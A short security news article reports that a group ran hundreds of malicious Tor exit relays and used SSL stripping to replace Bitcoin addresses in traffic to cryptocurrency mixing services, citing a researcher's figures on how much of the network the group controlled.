Hackers Hijacking Bitcoins through SSL Stripping
The Tor browser is meant to be a haven for browsing the internet securely. To make users connections private, Tor network uses a series of nodes (servers) to form a network, and relay the user’s traffic over several nodes until the final destination to make it harder to track. Though this process makes the connections slower, it’s fairly secure than browning in the open internet we all do every day. But, a hacker group seems to be hijacking the network by adding malicious servers (nodes) of his choice and intercepting the traffic for his profits. As reported by Nusenu, a security researcher and a Tor server operator, over 380 Tor exit relays were managed by the hacker group in May. Tor exit relay is the final endpoint of the Tor network, where the users’ traffic leaves the anonymous network to reach the final destination in surface internet. The hacker group herein is described to be performing SSL stripping, where he tries to downgrade the secure HTTPS connections of users to insecure HTTP, thereby able to modify the traffic as he desired. Here, the group’s found to be intercepting the users’ traffic to cryptocurrency-related websites, mostly the Bitcoin mixing services to replace the destination address. Bitcoin mixing service is where the funds sent to a specific address are broken down to serval petty payments and sent through various intermediary address to the final wallet, all parts joining there. This is to make it harder to track the payments and the receiver. So the group is trying to intercept traffic and replace their wallet address to hijack funds. At one point, the group can form over 380 nodes in the entire network, which makes upto 23.95% of the total. Though the Tor team vetted some points, the group is still able to control over 10% of the network, as per the researcher.